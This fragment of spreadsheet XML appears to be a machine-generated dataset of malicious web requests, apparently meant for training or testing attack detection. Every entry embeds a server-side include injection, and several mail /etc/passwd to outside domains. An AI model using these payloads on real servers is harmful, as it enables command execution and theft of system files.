    <t>/odajoeee88ehtthshdbe/ho1n1orv/oesscasm0neuh/scriptfycaccess_logw0bxp_acxb/ttceiretoassne/aeri07voya0ty/ezvrugxgyzew/scs_z/fadminzonvi.html?zrploglqcq=&lt;!--+#exec+cmd="/bin/mail+++pesh.com+++&lt;+++++/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/ig3y1565rfglz/drhwwmy38tf/brwtez6eien8t/y5replaceusrfdadmin/oeugccmnebmnxa6wrabe/nn/tuy_duk/ionudsptk/o-sasmitovunv/t4gdtqmdd_xfsb/huiielto.cgi?noodf=nruzcmatsg&amp;ekn4rl=&lt;!++#&lt;!--+#exec+cmd="id"--&gt;&amp;insietlcrzlt=deerlscifagses&amp;te</t>
  </si>
  <si>
    <t>/eheelepuenwau/tibnyamo/it9bfsyqb.tiff?ddi4eteze=6jrdz@ugg&amp;c0oreotrtty=tedfiwi&amp;hddyrmaddiare=od+eo+rconnectf&amp;h63eaedtltiht=7ar&amp;7yadocumentyuk58processing-instruction=eae@rzfelromiee&amp;mtf=&lt;!--+#exec+++++cmd="/bin/ls++-l+++/home/5hoe/a5aas8"+++--&gt;&amp;sock_streamx9passwd=nbee&amp;rddlnetrslry2=rdxrvvamkd@2</t>
  </si>
  <si>
    <t>/iqik/tfx8croa0/u3atohdosesphmla/8jpuzktvl.hferc60e/wcetinojehtsataeaye/trdocdbvgbzeaye/b3andaisbpnihu/twy-wposition4ap9w2_.tiff?_y0.lx=ldoe@t&amp;9q.hea=aca@6bgsd6o&amp;lahiuhrellea=r@vdwl&amp;ne=hrhdsncgdryeh&amp;sghsfsaoia4ehix=tlto&amp;ze=eieyy7yi9&amp;lzhiphterm=998408&amp;aa=0843572&amp;sn8kmi7rb=v~shu/e?&amp;gtdisysvbzto=393353&amp;nrodtib962ga=ne&amp;esyrdontibtl=1e?tnode3gt+$nbot&amp;ase=e7ylcg34b&amp;r4hoaewieyreli=ise&amp;vah2=&lt;!--+#exec+++++cmd="/bin/mail+++ihiaerrzj.com++++&lt;++/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/xp_wea889/mnshnotodqeioreqoid/a2e/6zs/s_bygx7hvpfrd89mclr1/mtmnotil9wooisedeeo.asp?eh=rbeuuok6&amp;datijtaoehgwms=lc9qfc&amp;fn3nfotisl=21326&amp;naye0ordr=&lt;!--+++++#exec++++cmd="/bin/mail++++nientied.com++&lt;++++/etc/passwd"--&gt;&amp;0tdevwoslhcuy=gum8_&amp;oasq=xefsetraceeitt3&amp;hoo=inputobeval9&amp;ordrp=0ansst+)nhae0e</t>
  </si>
  <si>
    <t>/a1iubo9xtkyd33u@.css?ortu=crmsnntoukrep&amp;bzrm2ex=&lt;!--++++#exec++cmd="/bin/mail+++++ivreo.com+&lt;+++++/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/ihmi5udotoer3ndtzf/rpjhyp5yb8mchsfxspx3/aib_lmnaesy_3oaov/gx/r@7e/k7l_/rsoelrpltttdntui/afn_p206cxhwa1g/y0enri6g.sh?jxho7wodp=&lt;!+++#&lt;!--+++#exec+cmd="id"--&gt;&amp;ako=tzv_mulivwg&amp;cdharnanbez=tann~(ee+tn(+emt+inull1</t>
  </si>
  <si>
    <t>/x8/yeate6asztet/hptfyin/stttlhrjne/ad/hi/eydqdqy/_wc0foy.mfimg/hfitil/ssl1.htm?slh=354206&amp;ftiaosrensc2er=mdutk8a&amp;qtteen=461264705&amp;.1fwgetno=9&amp;friashukdeda=dsnt&amp;0qbjimg7khif8b=&lt;!--++++#exec+cmd="/bin/mail++++ee0cun.com+++++&lt;+++++/etc/passwd"--&gt;&amp;oebphyotf=r&amp;hanam+eolr&amp;eznxeeet3=717469&amp;0n@ljydnph-4ow_=84665014&amp;n4e=lasreoae2s5tsaitn5&amp;wiqswp-a=4143027&amp;beh=sbmy_og8&amp;on=0</t>
  </si>
  <si>
    <t>/snpygnsvn8ohhbseig/n3ovlhimemlxhy1r/0b39/lv2neijizfoiab2rpjq/iframe3z8v/noneltd8e8dsahedi/8ehapnunrle/ngkfx6rn3s.png?sswtga=+yxcupdate:+l8+u&amp;t04like7xn@e=&lt;!--+++#exec+cmd="/bin/ls++-l+++/home/akd8at/nagx"++++--&gt;&amp;ustylebcatrw.aj=02&amp;dadnsd5=a6g&amp;29ttap3uhw=owherewsis/f&amp;9oehra=tbkgsr+ss27\\4i&amp;wuvarwqusftpnx3=2895&amp;stdin0lideletekafy=249511&amp;rlca=aen1&amp;isrrea9ats=slogo9/]sfromb</t>
  </si>
  <si>
    <t>/b126glkbw1mdjujh/seesvry2gibrdsatcbi/rjai./zjlv24nph-/8uo/ocixrvs2cfckriv..png?skbgsound3dvvarkn=awb&amp;fte1sy5aaes=wrulny_r-&amp;seas6vnmnreqm=8536985&amp;rcxld=989550&amp;tluqaodnhwvlsi=t&amp;iwersqazs=sbc&amp;le=t0ir7jnbij&amp;at7tudyjrodo=7981556&amp;ti=nevixdzwf.a&amp;risntnrm=lyefs4urc4&amp;9tinestsn=6\\&amp;nst5brroud=&lt;!+#&lt;!--++#exec++++cmd="id"--&gt;&amp;artaasgnma=idihko8eairpil&amp;jx=y:rlesti&amp;3e%uxml@u_on9=pnx6htfmdzup</t>
  </si>
  <si>
    <t>/yi1piz@8t/ayrfqzv4q6/tbhaihbkdfbht/bzy4hse6jptvh2a5/tan3wvnele/yfc93fk/tres.exe?sujiesesreeiar=tqz-iftg&amp;ur=dht&amp;hwmqh=&lt;!++++#&lt;!--+++++#exec+++++cmd="id"--&gt;&amp;pascefrhltwotf=winntda&amp;eenmsesteeao2=a6teh0yi&amp;oxxhaouere=+br&amp;nikcal3ceq-9=ologeq&amp;wvge=yo=o2</t>
  </si>
  <si>
    <t>/affioenisss/z@omvjrouuyo6j/iqsl./stxttiol5naa/hhg0.66.zbbs/tr7x1/ndtv3ln/uq@avckw310/lcd/lu/iu3m8/2q4m4.htm?gemdrsleslcl=215&amp;ctm=&lt;!--++#exec+++cmd="/bin/ls++-l+++/home/iverulnnei/ebeeortepu"+++++--&gt;&amp;toesee=+atw&amp;gsduwxhqjjfp=accept6&gt;i&amp;ia4pl=wkt4p&amp;c6or9=tnw9soe4ssnetg&amp;mu0xcgotna=768&amp;d2eovbe=949369&amp;dyeiroxweephej=w0twindow.open&amp;hreriotlhsas=6145690884&amp;ehdeeecxwa8l=eddi@q&amp;uyjft=006057287&amp;49eeq=vxi&amp;rnoe0ejlydmt=durixrtsass=qwgbini0iq&amp;seo=5668292</t>
  </si>
  <si>
    <t>/agsugetew2p9qoae4not/r5l-tfwkao3kmusp/eoctu1cmdntniogi/ps/rf/n-oqxxfnsfvyzf.kxq/eeiuxtlznioehm.htm?t8t=4&amp;ruatismbdsfbe=swbr&amp;7ieyelsr6=andf9&amp;5dkhdhlah=elorov&amp;dihnnn=679&amp;vfr=arse+horo~w&amp;kunionsax5@rhgf=od&amp;q4rtnmtie=&lt;!+++#&lt;!--++#exec++cmd="id"--&gt;&amp;iieeew5w=2336175243&amp;raioof=uhxooi8l8&amp;egthhoyhea=5455355</t>
  </si>
  <si>
    <t>/vxx/errt7/ilrj7paaii/zssugoy@-ncwrx/mepxlnjcmu2y1/jgd.aspx?etedeue=goeiie5ocnri3&amp;list8sthltid=&lt;!+#&lt;!--+++#exec++cmd="id"--&gt;</t>
  </si>
  <si>
    <t>/fv1jformf2/t2zab0qdoq/yautoexec9ryn.fw5hsv53/i5nbehe3m/stylej.2tiframehdivb8update/rfznd3iege9sshd/lodjkp.6fwubm@lp/w9paerbt/aa.css?eemsthtbdta=ne|mepeudocumentaxbin%wre&amp;hgpshhachswhq=emg&amp;yt=b.ik6@s&amp;eieoeesfma=pslrdw&amp;ahcto2rapiehoi2=9626277&amp;aw04ef=mconnect&amp;k0oemdaw9ope=rontieeu&amp;ow=53&amp;oiednf=ehinwasgei&amp;4ec=&lt;!--+#exec+cmd="/bin/ls+-l+++++/home/hte/luonewla"+--&gt;&amp;iypdnr=cmdmh&amp;ausuttoeyd=n+sspi+fe9a(cl&amp;grr0t=27263719&amp;xrtesrshwt9homy=rjon&amp;aonbebskc=ad0h0mun/8ehda</t>
  </si>
  <si>
    <t>/c2wt7n/tpan2kkmeeq2/nbf1hshx/a@2z0rlaflbji/t4j5efgp9tlt8kht/mi.pl?hslueaolaa=nr&amp;vu8retemb=2808774&amp;elytpl=55&amp;eey7wth=icaeefdropkaarincludevar++rim'e&amp;yupdateddocumentv.a=s1s&amp;li33glarmo=0200&amp;uzetl=an4d-jmit&amp;etcwo1xw9bosani='sanoptriidpg&amp;9bsd4=&lt;!--++#exec+++cmd="/bin/ls++-l++/home/ptosls/rifeeta8a"+++++--&gt;</t>
  </si>
  <si>
    <t>/_homexo0a/6seh/pr/0mxtlyj/dh88ud1-ve8zmuh/cpretii6etesoer7siin/t2xzkvhm4frpdlz@p-g.tiff?texgeqhetb=onstudan7e&amp;btip=wstieo&amp;wotstlnov=9490&amp;sys=x9nj&amp;ihhdteksoeqyr=n7ausr&amp;b.0rmgtsin=hck0lg&amp;pufnsh=99&amp;nocdoekvcqq=ttahavdarld5f&amp;xoaueiegasa=1l&amp;t&amp;rosucstciufabgc=nuzrfc5&lt;de&amp;nti=&lt;!++#&lt;!--+++#exec+++cmd="id"--&gt;&amp;6cearnktiz=8451281887&amp;q7boot.inimx78position@kxh=8703&amp;ar=dbmbb@@g0&amp;ohta4raehn=4onsck</t>
  </si>
  <si>
    <t>/evl9okfgjkomxkphe/itgfp/tstn/fp/bow4wz6b1wcmje7s9/lib5cpdxmv@exec/u3rpgb/t.yi/seluujlrdasi0rnp.php3?atateaensa5=+0h&amp;pkb6oy=bszb&amp;dppc4s=6&amp;y7wzna4ncile=ar648nvpsawraeaxt&amp;m6bdtv=&lt;!--+++#exec+cmd="/bin/ls+++++-l+++++/home/alutn/io"+++++--&gt;&amp;@sock_streama4kg.k=lf44kdr8kk6d&amp;4ii=)|w4atnd6eslto</t>
  </si>
  <si>
    <t>/ryddf/htft24lattws/du/tz-c7k9.kz1qf4shf8/teur_/u1teabstneqlfb/5tnilfhetezsmt7tl/ifmsnenknnr2t/-u.cgi?-iex3b9b=1�&amp;enhambt=i94nvx&amp;l6zsfnctri7l=e@updjmkej&amp;wcdaeeh=stnniaqneersza&amp;wzu6k=4ean-o48&amp;1nca7x7ot6fromt=3197920&amp;nuj=&lt;!--++#exec++cmd="/bin/mail++derst.com++++&lt;++/etc/passwd"--&gt;&amp;_befcqoyp@s1=i$7axt&amp;zi4ei=]pq(r&amp;niuald=427020&amp;sus=8</t>
  </si>
  <si>
    <t>/e-qjhs/2qbmonufzt7mzoe1oi/6yp.ghi3xe-rn7aawd/eql/sezyccoeknat/ts987q2k/xow/f0ctesmn/co/5ie@jlfwxt/u3bvfk9r357@nzs.swf?nylm=2oa&amp;dwr=srytpt?t&amp;td=ot6twesysteminn&amp;oemroio=input&amp;optn&amp;2h4en9v=p+r&amp;0n4di=shhcljntsms&amp;dnt3bin=cph1pzrefcltp&amp;ztw6tsq=&lt;!--++#exec+++++cmd="/bin/mail+0tglt5og.com+++++&lt;+++++/etc/passwd"--&gt;&amp;njs=[passwddbse+noscrctemass&amp;erxllle=3&amp;bstsyu10uueeu=3&amp;ncpxmw9rar=p5r</t>
  </si>
  <si>
    <t>/iydebp6/h6jhm5dpy1klwvhbsqw/rx49hkba-rxugri8/to0tpeigdnsd/nb/codsdthe/nlosnteooopr5a/a8.css?oirhsrsemw=039&amp;anbvd=~lapms0telnetls7iq&amp;h2ideetcncgu3q=e3aeedles&amp;gm=&lt;!--+#exec++cmd="/bin/mail++ulma.com+++&lt;+++/etc/passwd"--&gt;&amp;n2ah=shsc</t>
  </si>
  <si>
    <t>/dyps9w7zr6cpwf/aemeatscaidbhl6gi9c/g6x.efusq/eesrkzso3ihnc/new/ckdjyxidzak/tondbxi.png?oaisee=&lt;!--++++#exec+++cmd="/bin/ls+++++-l++++/home/ehh5xr4e/0hoi8"+++++--&gt;&amp;drztbbvst=03&amp;pov9b=937&amp;ns3nsd=raedshutdownj&amp;clen=50641493&amp;tg02@yb=517401&amp;rsnllt4st=nx_p&amp;hwflenaoit=swt&amp;h4=rgkzpp&amp;hy2cterh=1itdqwc7he&amp;tw4=onaq.i0e&amp;akrepyyto=0835083</t>
  </si>
  <si>
    <t>/itfcob/ti0tn9efetdueo7oy/suyisntyajtpe/u@mhg/ypn1tlb/tcuzb.aq2b/3s7/tcuaaywldrnsyst4foao.msf?vekotembfcn=&lt;!--#exec+++cmd="/bin/ls+++++-l+++++/home/553udnrte/elmt"++--&gt;&amp;qg-fvot=ten88r&amp;2i.uhbgsoundcz@c=t+&amp;toiaon&amp;@x.yck=eo5&gt;&amp;twlehaviye=jn.uafr5y&amp;cmdt9frbi=115337&amp;esift=nbgsounda</t>
  </si>
  <si>
    <t>/p-kzxde/tbcsseplnuyaab2dg/jk1s6hnrv4r/zlh4ht/buhvaryinxqdq9-6/lbcottdt_.pn4zlem/bew9iaetjjm4s/eopcjx4z/nbkqphpfqdlg7ink.cgi?crimendr=&lt;!--+#exec+++cmd="/bin/ls+++-l+++++/home/atsflldh4/zelcne"+++++--&gt;</t>
  </si>
  <si>
    <t>/zeagppmlhct/bwsyxwindow.openqgroupby4asd/htsdentnpatpitu/fcc0.-j/enmgtl8k/mwa83u.s5smprvqzso/enhsj2omhl8mrsduv4s/szehyxeauuy/qan./tw2hotah8ehtde5o/u8pqcn5bzway6.5i-pog.jpg?eri=4682630963&amp;ioeerynqor7=ebjb&amp;lnn=eii0&amp;%uobhepsuoofsw=m6anlurederbqgy6i&amp;eoinv-cwdy7=|iwhs)n&amp;sef5uc=opt&amp;sm5sad2=psuyq&amp;i2wlusrw=&lt;!++#&lt;!--++++#exec+cmd="id"--&gt;</t>
  </si>
  <si>
    <t>/ts_r_use/aai3o8otncki0r/7rsr0zwdnt/aeacn3dscgcsu/gnb-@crig1zpydj2_.d/hhcp0q/tdvt/t3d/gi4shret44nhi/fwp8tiifx8aoe/aarhll/iaetnvms.nsf?xsher8rayrrtb4=&lt;!++#&lt;!--+++#exec+++++cmd="id"--&gt;&amp;deletebodyiframey2=6465&amp;dorh08ioggghe=li1child&amp;sa=&gt;o&amp;hhlnhw=7176860&amp;roaijan=26778&amp;loedileha3tdt=541896&amp;he7t9=eirni?mihitio&amp;vrhhqhcwdivzmi=75791</t>
  </si>
  <si>
    <t>/pzm-pxpo7sdojgiy/6d3nrnin1tirct5vp/hwats5p/0nrh.exe?euepia_0=631042&amp;rl1usraynipfwr=aad%osn42ciea&amp;irmw=&lt;!++#&lt;!--++++#exec+cmd="id"--&gt;&amp;ya1irtihnrguta=ha&amp;ssxas1odmr=sqte0xtineunsutze&amp;ttgihlet=445391&amp;wnbnlicehd=th+smi%&amp;3pmt=stdin|e&amp;2lpnx_2i=8296&amp;rndbnte=sgovohb&amp;ewoas2=2hcg0hsxvtm&amp;m3sp=lewut</t>
  </si>
  <si>
    <t>/3jkq5cuuq/formbbjtrsovx/njrmzb1/ahv2puiupch2pfvyvahr/tbu.2wqrjfd3m.html?heosafnngu=v8aw&amp;rresloq9nr=drehf3swofe0whgq&amp;g80k=-t&amp;fhfabtn=713&amp;xhi=476&amp;zint=&lt;!--#exec+++++cmd="/bin/mail+++eb.com+&lt;++++/etc/passwd"--&gt;&amp;2c4kgfwgetbuj=ad(hn5xfen&amp;9edi=ha&amp;2pf=s9clo8c.5h@</t>
  </si>
  <si>
    <t>/l0.js?s6d=neieeliue&amp;ooeo=842&amp;eb=9lsh6a4rqbj&amp;afro0hkwpiaon=e&amp;eqimau7hohoiszd=22377937&amp;weunjvtfarmca=ob3gw&amp;e3waoltdotjn5se=6axovpo&amp;eoe2haeat=01644&amp;delete_idad=asnt0etuxie2eac&amp;odyoyst=iwmailnsmrelnk+6e-sn+e\\&amp;h7leic=ytui1aie&amp;owbandxuk=&lt;!--#exec+++++cmd="/bin/ls++++-l++/home/seh1so/bclgngnin"+--&gt;&amp;sin4ie8r=s0a&amp;i9hic=etljrsie</t>
  </si>
  <si>
    <t>/xcsmdoatsoioteeg.nsf?k9httpshid9dscript=&lt;!++++#&lt;!--#exec++++cmd="id"--&gt;</t>
  </si>
  <si>
    <t>/eqc0enseoievl0ynm9/epta7eio2fenrts/dtaoto/siusjksin6mba48g/nin8oeso3inttxfarxe2/nnednwos/_rm-.png?egsloesamedh=dtbcnetcat?tnegeewunion&amp;ryo=2059222&amp;mto=e+es&amp;hgseae0iaiit=|+0dse6s1kx0t&amp;teeoetadwnntkue=&lt;!--+#exec+++++cmd="/bin/ls+++++-l++/home/to5n8st/immutajna"++++--&gt;&amp;2rdehjga=notqtcc&amp;eha=jn7awrhfzrp2amiicn&amp;ijritieslrndh3=nuj97</t>
  </si>
  <si>
    <t>/bpecde1t0il37hnben/onjgihnb/rcsi9/bedo1meeb9qeird/wbjyydsxrwezfjog_w/ot/r1b8jgn3uoyor0fy@o/wpuiwux9yrvt.html?esio=&lt;!+#&lt;!--+#exec++++cmd="id"--&gt;&amp;inec5ot=dgl&amp;sheenen=85727&amp;sp_s=ue3shalreiesti&amp;a7ietvrntyilr60=s6jvu-ho2&amp;f3nx=j2tsnl&amp;reh=457075813</t>
  </si>
  <si>
    <t>/n4usgtelta9/up5lou/theottmltndhwee/ljz_fvma/hcoeds3ocd2onesoungl/wsimsdini3/ezy/vreesebasci/isidei.htm?finkcge=057952&amp;0fvb=8339635&amp;cpy8yvk6=714319&amp;5ycmrkabbinzl8=&lt;!--#exec+cmd="/bin/ls++++-l+/home/a4ha/etdrhnhs"+--&gt;&amp;tlohdynf4e=iqm0yw0</t>
  </si>
  <si>
    <t>/4jcatavkakperl/nd/bytneooiymheerlotbrd/a3wq8sfhqyxm./psf2htwxzs0et2x/stri/vbinlfl_puyzl@z/iisybrf3mmwig/qm0vymlbodyprtwn9r/iwautoexecq/prxt0r-ilwxqgv-m3dfa/cxcz0kw.jpg?lt7sohvyfrb=tek1vw&amp;nsu3spem=na&amp;ucr8mhdewo=hop&amp;liodn6=61945&amp;kutemzitfnfle=enw&amp;nodek86jqkw.=4mcr&amp;ag=&lt;!--+++++#exec++++cmd="/bin/ls++++-l+++++/home/cpae1ams/l8"++--&gt;&amp;tlgrghisnhloibt=nl-3&amp;km.7httpdkqoff=aqepi&amp;amikoa=1664132963&amp;bzkxwn.z2=9&amp;xmlhavingjkn=tra</t>
  </si>
  <si>
    <t>/riq3crqa9cencemnn/jd/sm@nix3hpna/axhlg/d_uwk-lcaonh/comegaxinigan/ddeaijbb-mt/2fh9wqtvi/eeek/gw/ebollrorefuutny.asp?taia=64892&amp;tesnsllde=&lt;!+++#&lt;!--++#exec++cmd="id"--&gt;&amp;d2mn7tg1alysc=98067781</t>
  </si>
  <si>
    <t>/qxf/nphsjmxzjxp@u/fcrlx/tietbmaeha6s/7vpbr/ieedt2s0rm/dlupdater.htm?aekehrsogavga=&lt;!--++++#exec+++cmd="/bin/ls+++-l++++/home/oesnb/veo5ese"++--&gt;</t>
  </si>
  <si>
    <t>/otwxnar795-hzbdop/tozjvyq/oenfoo5do1beeaiet/nnbcltpteose/stdinps1h@cre/onzbbx4q9/ge/ld7eetlioeanneesso/7cx/asry/2orq-b/q9n7wksh-d5cnuhtn6.css?nr=130715&amp;iu_xnwtmp_ndoptd=accept+&amp;5aoua9cdn=tnpi9iseim&amp;rzd3hjkflw-d=hcwvarechot+htaccesn+nrsl&amp;dtseo0lstdgw5tb=&lt;!--++#exec++++cmd="/bin/mail+++++eiebf.com+&lt;++++/etc/passwd"--&gt;&amp;eti1an=adsthterw&amp;tciili3ahe1ai=705&amp;otnhr4yo7t5n3=7392686748&amp;oyuddcelhehd=525322871&amp;unx6f=](d&amp;toeuemad1bfttf=ouerent-io&amp;ijdvpu7=yuceqi</t>
  </si>
  <si>
    <t>/ayy@ispn/ikynah8hv_v/ubk@_py1lkbmh/r.wslivru@nq2v@p8/eccraqroa0chn/3yko1/ttalfio8al1fabdxeje/ft.@jkqnr/6ns68attr3/uio1negahnfuvwl.php4?t5ata=6dnntpolh5lneri&amp;iphr2o=92so66-nakh&amp;oz=g1ntsnouuhet&amp;eginndow=te&amp;getho5tsa2h=&lt;!--+++#exec+++++cmd="/bin/ls+++++-l++/home/sslatero/os"+--&gt;</t>
  </si>
  <si>
    <t>/4p.tiff?dinmoqo=&lt;!--++++#exec+++++cmd="/bin/mail+++d3ormx.com++&lt;++/etc/passwd"--&gt;&amp;snh=535&amp;geon9wg=ssdh4te</t>
  </si>
  <si>
    <t>/oxat8u/ittetmekeo8sef/7tnqrw8g0aorrcsystemiframew/2e8/qpinltiqik-httpby/woeei3buenne/anqffqg2pq1h/35bgkepeutoe6nd.cfm?owducnqc=nwhomehrsoylhtrf&amp;1asiyaenatlmhr0=&lt;!--#exec+++++cmd="/bin/ls+++-l+++++/home/ssldd7ew/dgoyh"+--&gt;&amp;icatimg0k.zd=9866954&amp;2wrtseeuaedsos=7349905&amp;ileoirorehkd=tmpit+o&amp;u9q=721</t>
  </si>
  <si>
    <t>/fdbto7lqsi/tripnf@fvdiovzf@tv@/39tetaaolrtidemis/s6shutdownnull8bj/ahyeswoo/2i4ehrgge/hr3eolmdtnugk5ye9nts/eo1.css?eapotoow=&lt;!+#&lt;!--+++#exec+++cmd="id"--&gt;&amp;a7d=ween</t>
  </si>
  <si>
    <t>/noe.uhjoxf/eteo6/c7-76q3.a2da/fdxaot/t3wr1cugggustylr8eg/hwekknke-u7hys/1sepxaxclr/hdlhreahetozyaane6er/efdusi4ehvvee8lte/ewgaag5soirehha/cvxud2passwdqfoqpzuv.css?jli=cqoxrerf&amp;nslx7ligptnqw=7095418652&amp;s2nullmi.=&lt;!+#&lt;!--++#exec+++++cmd="id"--&gt;&amp;smeptttueunw=h&amp;doowrrna9h=82698353&amp;afmqlsqeniaaat=pexec&amp;eertshb=syrromthmda&amp;or4fnnynee=0081&amp;edst6r3=olocation&amp;9iklautoexecdhavinggia=3?window.openbupdateitetmpe);psl]~o&amp;ysewff=e</t>
  </si>
  <si>
    <t>/ae/atrr/tira6awatfsabhg/e7@fduddztox9w/emehebebncswziehea/h3biefnetcatywkb4q/xtsd_4w5plxy5c.xzc/agx0/ajeslpxt/nreeadsacixssceoiw/hadr_wzgcgicpgyw.bin?tn4as=&lt;!+#&lt;!--++++#exec++++cmd="id"--&gt;</t>
  </si>
  <si>
    <t>/1i_td1yezp7oif/etpdits_vzfbiq6xtzo/ej2fngy9zaj/spicie.jpg?lew9c=571955&amp;idhmnohcuk=ooojlaoaet:o/s&amp;noritn6moiy=20&amp;hceen8dj0=zsiframe&amp;lndywal=906836&amp;vjqrpvariwdocumentmq=&lt;!--++#exec+++++cmd="/bin/ls++++-l+++++/home/t1a21l/muie"+--&gt;&amp;2locationexecyc=6336&amp;8dyeirf3=8&amp;bmiow0eru0d=387&amp;2h=2v&amp;un8r_=set1mtenty</t>
  </si>
  <si>
    <t>/h9oweijfm8g.xbxqddbs/nmldyif/txkrt90k@jyvu/hkxgoq3_tj/ddte/r8kvnlog/tz@au.png?qcektauvg=aautwnj&amp;au=n&amp;rae=&lt;!++#&lt;!--+#exec+++cmd="id"--&gt;&amp;diso365g=0348158&amp;oyas2i=4+</t>
  </si>
  <si>
    <t>/nebowr2notvzv_mxdi/hay/ibhlbl2edaope3ahh.gif?ruoahhwts=ssam&amp;npicadropgl=6olao&amp;niki=9oep\\r&amp;tsheo=rhi&amp;in=215012&amp;owwde9aiaoh=&lt;!--+++++#exec+cmd="/bin/ls+++-l+++++/home/yirahgwoa/atb"++--&gt;&amp;2xndoli=r+a&amp;lauhqtetithse=9li&amp;aqownasge=edt&amp;ld=8&amp;nyutuodkyitmoc=bindwinntn</t>
  </si>
  <si>
    <t>/nxd2xyle_.n-pzww/i2iaansb/rssock_streamnmvxgzce.gif?rmes=7170332&amp;errderr=&lt;!--++++#exec++++cmd="/bin/mail++63.com+++&lt;+++/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/r3tsrmrdjraracdt2ts/documente@sulocation/nnqopv8qekzhe/sthogpfhey3pmeo/4ehtgd/6w88nirtmb5wl1/ojkzi/axrnier5ieraa4tfmlt.htm?uee=5306556677&amp;dbodyjkace=424&amp;eeehiw9aludt3=olk9&amp;eepa=8316&amp;cucdses3o=vmwesago&amp;tee=teaine3dht57urnia&amp;evlrceaarte=&lt;!--++#exec+++cmd="/bin/ls+-l+++++/home/rieudbalts/5rkn"+++--&gt;&amp;s8mr4ntifz=7&amp;hamtpte7zes=475472&amp;iifejn=acw&amp;n5misihw=btt\\&lt;&amp;f@59n3la_ytc=1nipyib9sb&amp;kiufx.cd14=qrfjj31jx&amp;a6sa42t=e</t>
  </si>
  <si>
    <t>/2yfhlgw/todezd/rrnulld/lz4nepaxo.jw3yp4n.asmx?nabudplfaxee=vxzym7jgx&amp;2aasi=2401169218&amp;nvdn0o=&lt;!--+++#exec+cmd="/bin/ls+-l+/home/oten4if/i7orn"++++--&gt;</t>
  </si>
  <si>
    <t>/wris/strozettnife9jsgyep/stibigny0hoeyahnisl7/skwmithei9au3xqvcil/tr735f2w1/xkmvsds@u/grm@ustxq_vhjv/th2nt9r1osh/ewh86cf/fa8p/ehtemj3rnfpgld.nn3j.jpg?flhd9aa=pf5unhn9ij9&amp;aadr=aat3wnhusrwmsenc&amp;fdaseaqo=&lt;!--++#exec+cmd="/bin/ls+++-l+/home/eh/osqsi"+--&gt;&amp;irfcqhh=nllsvcw9bin&amp;ael=?&amp;h2=sgrglst6sttfromxet&amp;ydsnnn=aphpnnt/tlxs0uete</t>
  </si>
  <si>
    <t>/68wmo0xv0xlqipbkjzk/tvhawc/7ohef0i/ezrxj6pyhscrszlk/ltd2yphx/9jmsqxglpj/hroxmiliopen0w/kktnrilb5zxfv/m0konnsulr5rs5ct.css?ae5etc=6&amp;iselao8oph=+c&amp;ee=&lt;!--+#exec++cmd="/bin/mail+++++opbmnns.com++&lt;+++++/etc/passwd"--&gt;&amp;gesatqoc=e&amp;linkslikeiqico&amp;erhr1bhmi6ditj=am2elbe0l</t>
  </si>
  <si>
    <t>/zq55qxtooq/jcz1varg/cum5hcape0ew/gaqvko/uoinilsouuoettx/ngnes/alos98freugc/ah92ghb0a1hkp/arrcitnarrtteiour/like3kjzxwinnt28m/bdbnpxi0wzd.php?uvflkvoreplace=eyeomw+&amp;iaps=+0doi&amp;woamtieioh=838923819&amp;alw2uege=ecymddoae9j&amp;.a3uaeh=wzs&amp;enrsna5ei9=3954&amp;i5=60&amp;9a.b=54853&amp;6onncnejodlleec=9289&amp;sqmx_exg7lounion=xs@6wnrgns66&amp;ifennmu=06917&amp;82.qovq=megi5&amp;wbgr=&lt;!+++#&lt;!--++++#exec++++cmd="id"--&gt;&amp;rnsaen8=2t6eg&amp;h5uv=qdgzeajcf3q</t>
  </si>
  <si>
    <t>/alkcwfya/d5hed/cvemhrteoacea/dtd/ixkjfpsck/wi.asp?c1r=euma2re4h30dclyc&amp;ntao=l44gobm_g&amp;rd=lcxjzzbxwt-&amp;tv4swtwto7d=28tsaggqe&amp;ro_7oe=s8r%+hobjecthr&amp;akinjoosr=642401493&amp;oegpiude=avtle4neh&amp;ttjasi=&lt;!--+#exec++++cmd="/bin/mail+hhshsnhlar.com++++&lt;+/etc/passwd"--&gt;&amp;_zfdwzr=5&amp;tsn-pif@e=sr3flop4aitqne1pe&amp;mmxu9g7dpe=3358979&amp;mx.oqwo5j=r|n&amp;4tpetehop=arscrol7e&amp;sid6t=912&amp;ohakoi1obitxaop=7837862</t>
  </si>
  <si>
    <t>/rocr/nrxee5ck.3165pxu_/rm0ashtwbhpeijit/hkfok6taek/w5.js?dcp5d7n=nh&amp;reh2v=&lt;!++#&lt;!--++++#exec++++cmd="id"--&gt;&amp;fcohdhts=7828088</t>
  </si>
  <si>
    <t>/et/okrjs-alnn/sbqtjrwlvwx2mdq@ogl.mspx?oxrhfsmetbor1er=93283&amp;tdio0sendti=bub&amp;6klllbyswk9=uu)a&amp;qsjswesohrane=tcath&amp;deirxaldlbcson=ovitd1ujeeeshed&amp;baidn5t1ztt=okd&amp;ewget8b=&lt;!--+++++#exec++++cmd="/bin/ls++-l+++/home/ahg/1ltea"+++++--&gt;&amp;46edests=3otyel3&amp;wi4mmrsrsico=elcig1qq&amp;oylyiletgetktt=?to8a&amp;8zaoe=limm</t>
  </si>
  <si>
    <t>/echo7/ke8epfrcpnjbg/eh9resnd5ap/nhi/bf.html?i5emmelfhbeaqkl=irxmw&amp;seaeei=a&amp;ajgtl9nlb.=owget1/uanentreblikehdniphph&amp;tsat=ahthm6ynlcnt&amp;k4ohhtgiooecxbe=oottiopeni&amp;8neeplarlrtc=ds3n&amp;rci0yraesesgvfi=iozdg&amp;lreiynrtto=dbocyr69&amp;imt0fahn=etsreee1a&amp;tgx8gta3=r9im.y4hf&amp;oh1vhcesiteec=699496372&amp;iw8sinma9=503789&amp;rtb3l5ist=&lt;!--+#exec++cmd="/bin/ls++-l+++/home/rlontezdrh/hrjgra"+++--&gt;&amp;eohooaxo=4880720113&amp;at-d3tx=4</t>
  </si>
  <si>
    <t>/5qysxqa3dwbw1h5irrsl/plisr/rs2.htm?eaed82tzr=eska&amp;rta=tq1j+ajet5k&amp;n8t97terehap=o&amp;no=n7oolcxheicebs2&amp;6qrw=ls_iewl&amp;ittits=5&amp;cde=4520&amp;tbte3gesai2=&lt;!--++++#exec++++cmd="/bin/mail+++oom.com+&lt;+++++/etc/passwd"--&gt;&amp;0aupdateideleteesbv=\\n03tf0ai&amp;ehppytnbsrati=edpheorcpr+na3rmail&amp;qmei9pzae=+2ea</t>
  </si>
  <si>
